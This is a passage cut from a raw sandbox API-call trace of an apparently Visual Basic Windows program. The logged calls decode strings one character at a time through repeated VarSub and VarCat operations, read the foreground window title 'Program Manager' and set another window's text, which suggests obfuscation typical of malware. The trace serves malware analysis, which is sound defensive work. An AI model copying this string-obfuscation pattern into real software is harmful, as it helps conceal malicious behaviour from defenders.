cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.322] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.322] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.323] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.323] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.324] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.324] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.324] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.325] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.325] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.326] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.326] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.326] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.327] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.327] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.327] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.328] GetForegroundWindow () returned 0x20086 [0181.328] GetLastError () returned 0x0 [0181.328] SysStringLen (param_1=" ") returned 0xff [0181.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0181.328] SysStringLen (param_1=" ") returned 0xff [0181.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0181.329] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0181.329] GetLastError () returned 0x0 [0181.329] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0181.329] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0181.330] SysStringLen (param_1="Pro") returned 0x3 [0181.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pro", cchWideChar=4, lpMultiByteStr=0x116859c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pro", lpUsedDefaultChar=0x0) returned 4 [0181.330] SetWindowTextA (hWnd=0x103c4, lpString="Pro") returned 1 [0181.330] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0181.331] GetFocus () returned 0x0 [0181.331] lstrlenA (lpString="Pro") returned 3 [0181.331] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116859c) returned 0x1 [0181.331] IsWindow (hWnd=0x103c4) returned 1 [0181.331] IsWindow (hWnd=0x103c4) returned 1 [0181.332] IsWindow (hWnd=0x103c4) returned 1 [0181.332] IsWindow (hWnd=0x103c4) returned 1 [0181.332] GetFocus () returned 0x0 [0181.333] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0181.333] GetFocus () returned 0x0 [0181.333] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0181.333] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0181.333] GetFocus () returned 0x0 [0181.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0181.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x116859c, cchWideChar=4 | out: lpWideCharStr="Pro") returned 4 [0181.334] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0181.334] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.383] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0181.384] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.384] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0181.385] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.385] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0181.386] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.387] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0181.387] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.388] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0181.388] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.389] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0181.389] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.390] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0181.390] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.391] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.391] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.392] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.392] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.392] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.393] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.393] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0181.394] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.394] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.394] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.395] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.395] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.396] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.396] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.396] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.397] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.397] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.400] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.400] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.401] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.401] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.402] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.402] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.402] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.403] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.403] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.403] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.404] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0181.404] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.405] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.405] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.405] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.406] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.407] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.407] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.407] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0181.408] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.408] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.408] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.409] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.409] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.409] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.410] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.410] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.411] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.411] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.411] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.412] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.412] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.412] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.414] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.415] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, 